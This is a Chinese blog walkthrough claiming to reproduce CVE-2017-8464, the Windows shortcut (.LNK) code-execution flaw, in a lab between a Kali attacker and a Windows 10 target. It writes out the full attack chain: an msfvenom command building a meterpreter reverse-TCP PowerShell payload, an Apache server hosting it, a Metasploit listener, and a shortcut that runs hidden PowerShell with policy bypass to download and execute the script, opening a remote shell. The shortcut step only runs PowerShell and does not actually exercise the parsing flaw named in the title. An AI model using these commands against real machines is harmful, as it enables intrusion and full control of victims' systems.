cve-2017-8464 复现 快捷方式远程代码执行

cve-2017-8464

  • 2017年6月13日,微软官方发布编号为CVE-2017-8464的漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。
  • 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户在Windows资源管理器或解析.LNK文件的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。

环境

  • 攻击主机 kali 192.168.1.108
  • 目标主机 win10 192.168.1.106

攻击过程

1.在kali上生成一个powershell的反弹后门

  • msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.1.108 LPORT=443 -f psh-reflection>1.ps1
  • 生成一个1.ps1文件

cve-2017-8464 复现 快捷方式远程代码执行

2.启动apache,使目标可以远程访问1.ps1文件

  • cp 1.ps /var/www/html
  • service apache2 start

cve-2017-8464 复现 快捷方式远程代码执行

  • 在目标机(win10)上使用浏览器访问

cve-2017-8464 复现 快捷方式远程代码执行

3. 在kali上侦听木马

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LHOST 192.168.1.108
set LPORT 443
exploit

cve-2017-8464 复现 快捷方式远程代码执行

4.在目标主机上(win10)创建恶意快捷方式

快捷方式:powershell -windowstyle hidden -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.108/1.ps1');1.ps1"
名称可以任意设置 。
参数含义:
-windowstyle Hidden 隐藏自己的窗口。
-exec bypass 绕过策略。
IEX (New-Object Net.WebClient).DownloadString('http://192.168.1.108/1.ps1') ;1.ps1 在远程服务器上下载脚本执行。

cve-2017-8464 复现 快捷方式远程代码执行

5.反弹会话

  • 在目标机器双击恶意的快捷方式,kali得到反弹回来的会话

cve-2017-8464 复现 快捷方式远程代码执行

上一篇:使用GULP打包、压缩与打版本号


下一篇:《LeetBook》leetcode题解(14):Longest Common Prefix[E]